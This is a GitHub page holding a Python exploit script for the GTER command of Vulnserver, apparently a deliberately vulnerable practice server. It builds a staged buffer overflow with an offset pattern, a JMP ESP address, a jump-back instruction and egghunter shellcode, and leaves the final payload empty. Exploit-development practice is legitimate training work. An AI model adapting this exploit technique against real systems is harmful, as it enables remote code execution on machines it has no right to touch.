-
-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathvulnerserver_gter.py
67 lines (54 loc) · 2.37 KB
/
vulnerserver_gter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python
import socket
import os
import sys
from struct import pack
import time
host = sys.argv[1]
port = int(sys.argv[2])
payload = b"" # ADD PAYLOAD
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\xb8\x3a\xfe\xff\xff\xf7\xd8\xcd\x2e\x3c\x05\x5a\x74\xeb\xb8\x77\x65\x62\x30\x89\xd7\xaf\x75\xe6\xaf\x75\xe3\xff\xe7"
egg = b"web0"
def send_msg(buffer):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print (s.recv(1024))
s.send(buffer)
print (s.recv(1024))
s.close()
# 1 - Crash
buffer = b"GTER "
buffer += b"A"*1000
# 2 - Offsets
buffer = b"GTER "
buffer += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
# 2.b - Check offsets + JMP ESP
jmp_esp = pack("<i", 0x62501203) # bp 0x62501203; g
buffer = b"GTER "
buffer += b"A"*151
buffer += jmp_esp
buffer += b"B"*(1000-len(buffer))
# 3 - JMP ESP and jump back
jmp_esp = pack("<i", 0x62501203) # bp 0x62501203; g
buffer = b"GTER "
buffer += b"A"*151
buffer += jmp_esp
buffer += b"\xe9\x63\xff\xff\xff"
buffer += b"B"*(1000-len(buffer))
# 4 - Egghunter
jmp_esp = pack("<i", 0x62501203) # bp 0x62501203; g
buffer = b"GTER "
buffer += b"\x90"*12
buffer += egghunter
buffer += b"A"*(151 + len("GTER ") -len(buffer))
buffer += jmp_esp
buffer += b"\xe9\x63\xff\xff\xff"
buffer += b"B"*(1000-len(buffer))
# 4.b - Message with egg
msg_payload = b"GMON "
msg_payload += egg*2
msg_payload += b"\x90"*12
msg_payload += payload
send_msg(msg_payload)
time.sleep(1)
send_msg(buffer)